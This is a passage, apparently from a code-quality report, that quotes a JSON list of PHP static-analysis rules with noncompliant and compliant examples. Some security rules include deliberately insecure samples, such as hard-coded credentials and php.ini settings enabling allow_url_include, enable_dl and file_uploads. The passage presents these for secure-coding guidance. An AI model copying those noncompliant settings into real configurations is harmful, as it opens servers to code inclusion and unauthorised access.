<td><code>is_writable<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>join<\/code><\/td>\n      <td><code>implode<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>key_exists<\/code><\/td>\n      <td><code>array_key_exists<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>magic_quotes_runtime<\/code><\/td>\n      <td><code>set_magic_quotes_runtime<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>pos<\/code><\/td>\n      <td><code>current<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>show_source<\/code><\/td>\n      <td><code>highlight_file<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>sizeof<\/code><\/td>\n      <td><code>count<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>strchr<\/code><\/td>\n      <td><code>strstr<\/code><\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. 
This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n  Broken Authentication and Session Management <\/li>\n  <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. 
This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n  firstActionInBlock();\n  secondAction();  \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++)\n  $str = $array[$i];\n  doTheThing($str);  \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n  firstActionInBlock();\n  secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i &lt; count($array); $i++) {\n  $str = $array[$i];\n  doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) 
and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct() {\n    $this-&gt;object = new SomeOtherClass();  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n  public function __construct(SomeOtherClass $object) {\n    $this-&gt;object = $object;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. 
To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n  Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. 
This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\"  Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\"  ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. 
Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini  Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. 
Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n  <li> see the URL over the user's shoulder <\/li>\n  <li> be sent the URL by the user <\/li>\n  <li> retrieve the URL from browser history <\/li>\n  <li> ... 
<\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1  ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n  Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. 
Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1  ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n  <li> It can significantly impair the readability of the code. <\/li>\n  <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n  <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. 
<\/li>\n  <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n  <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n  <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n  other than that cause by the increment or decrement operator <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n  effects <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n  same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a &lt; $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning 
<\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n  <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n  echo(\"i = $i\");\n  $i++;\n  if ($i &lt; 10){\n    goto loop;\n  }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++){\n  echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n  <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/php.html by fixme

      BUG found
      Open

              window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. 
Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n *\/\nfunction myFunc(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the function names against","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S101","repo":"php","name":"Class names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all class\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression <code>^[A-Z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass my_class {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the class names against.","defaultValue":"^[A-Z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S103","repo":"php","name":"Lines should not be too long","htmlDesc":"<p>Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.<\/p>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"maximumLineLength","htmlDesc":"The maximum authorized line length.","defaultValue":"120","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S105","repo":"php","name":"Tabulation characters should not be used","htmlDesc":"<p>Developers should not need to configure the tab width of their text editors in order to be able to read source code.<\/p>\n<p>So the use of tabulation character must be banned.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1066","repo":"php","name":"Collapsible \"if\" statements should be merged","htmlDesc":"<p>Merging collapsible <code>if<\/code> statements increases the code's readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  if (condition2) {\n    ...\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1 &amp;&amp; condition2) {\n  ...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1067","repo":"php","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and 
<code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold value of 3<\/p>\n<pre>\nif ((($condition1 &amp;&amp; $condition2) || ($condition3 &amp;&amp; $condition4)) &amp;&amp; $condition5) { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ( (my_first_condition() || my_second_condition()) &amp;&amp; my_last_condition()) { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1068","repo":"php","name":"Unused \"private\" fields should be removed","htmlDesc":"<p>If a <code>private<\/code> field is declared but not used in the program, it can be considered dead code and should therefore be removed. This will\nimprove maintainability because developers will not wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass {\n  private $foo = 4;                       \/\/foo is unused\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n\n  public function compute($a) {\n    return $a * 4;\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S107","repo":"php","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 
parameters:<\/p>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4, $param5) {\n...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($param1, $param2, $param3, $param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"},{"key":"constructorMax","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S108","repo":"php","name":"Nested blocks of code should not be left empty","htmlDesc":"<p>Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 42; $i++){}  \/\/ Empty on purpose or missing piece of code ?\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When a block contains a comment, this block is not considered to be empty.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1105","repo":"php","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition)\n{\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (left and right curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1109","repo":"php","name":"A close curly brace should be located at the beginning of a line","htmlDesc":"<p>Shared coding conventions make it possible for a team to efficiently collaborate. 
This rule makes it mandatory to place a close curly brace at the\nbeginning of a line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(condition) {\n  doSomething();}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(condition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>When blocks are inlined (open and close curly braces on the same line), no issue is triggered. <\/p>\n<pre>\nif(condition) {doSomething();}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1116","repo":"php","name":"Empty statements should be removed","htmlDesc":"<p>Empty statements, i.e. <code>;<\/code>, are usually introduced by mistake, for example because:<\/p>\n<ul>\n  <li> It was meant to be replaced by an actual statement, but this was forgotten. <\/li>\n  <li> There was a typo which lead the semicolon to be doubled, i.e. <code>;;<\/code>. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  ;                                              \/\/ Noncompliant - was used as a kind of TODO marker\n}\n\nfunction doSomethingElse($p) {\n  echo $p;;                                      \/\/ Noncompliant - double ;\n}\n\nfor ($i = 1; $i &lt;= 10; doSomething($i), $i++);   \/\/ Noncompliant - Rarely, they are used on purpose as the body of a loop. It is a bad practice to have side-effects outside of the loop body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething() {}\n\nfunction doSomethingElse($p) {\n  echo $p;\n\n  for ($i = 1; $i &lt;= 10; $i++) {\n    doSomething($i);\n  }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment provided that\n  the first character following the null statement is a white-space character. 
<\/li>\n  <li> MISRA C++:2008, 6-2-3 - Before preprocessing, a null statement shall only occur on a line by itself; it may be followed by a comment, provided\n  that the first character following the null statement is a white-space character. <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7gCTAw\">CERT, MSC51-J.<\/a> - Do not place a semicolon immediately following an if, for,\n  or while condition <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/i4FtAg\">CERT, EXP15-C.<\/a> - Do not place a semicolon on the same line as an if, for,\n  or while statement <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1117","repo":"php","name":"Local variables should not have the 